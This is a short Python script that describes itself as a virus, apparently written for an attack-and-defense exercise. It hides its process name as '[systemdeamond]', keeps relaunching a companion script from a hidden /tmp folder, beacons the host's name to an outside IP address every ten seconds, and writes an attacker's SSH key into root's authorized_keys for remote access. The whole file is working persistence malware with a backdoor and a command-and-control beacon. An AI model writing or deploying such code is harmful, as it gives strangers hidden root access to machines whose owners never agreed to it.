#!/usr/bin/python
import os
import time
import requests
import setproctitle
import subprocess
from socket import gethostname

HOSTNAME = gethostname()
VNAME = "cantstopthis"
VIRUSNUM= 3 # CHANGE THIS TO CORRECT VALUE
SSH_KEY = """ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtKvjef/vlR2NKdqVUbvKn6q/M25fFwXRog3+rgg3GMZXUYdkjGrcVpm+OcP0lDAiKHCkaVFRKTB88qY22W3orpgt/V8j4HYNroSusS1RbcazAysikiiNGbyzxSQwHHaZd07BBvtOOWFr34uwUth081Ca59pLK4wbVgnvbFLwjPLcQkmSND3NTEXjBXG1PjYTeZMa9/atlSEKSaqzKcNF+B8x3DHoJiDc2Wy38FOaiBXT9H1OHJmiFawQfRU6duoLJTzAnQ1t4aWrewLDt1CAt2Ehhwrz2cJiwsnZrGXNDHYVUwgph9PngpvJVlP+lw4smRf7lCs0RGMGpUonenvo/ fred"""

# Return whether the ssh key is already in the authorized_keys file
def ssh_key_added():
    if os.path.isfile("/root/.ssh/authorized_keys"):
        with open("/root/.ssh/authorized_keys") as f:
            lines = f.readlines()
            lines = [l.rstrip('\n') for l in lines]
            return SSH_KEY in lines
    else:
        return False
    
# Rename the script to be a bit more innocuous
setproctitle.setproctitle("[systemdeamond]") 
while 1:
    # Start cantstopthis script if it is not already running
    os.system("/usr/bin/flock -n /tmp/vlock.lock /tmp/\,/" + VNAME + " &")

    # Let the monitoring server know I am still alive
    requests.get("http://68.183.100.83:8080/api/submit", {"id" : HOSTNAME, "virusName" : VIRUSNUM})

    # Append an ssh key to authorized_keys file if it is not already there
    # What's the fun of having a virus if it doesn't give me some sort of remote access?
    if not ssh_key_added():
        # Assuming .ssh folder exists here... 
        os.system("echo '\n" + SSH_KEY + "' >> /root/.ssh/authorized_keys") 

    # Repeat every ten seconds 
    time.sleep(10)

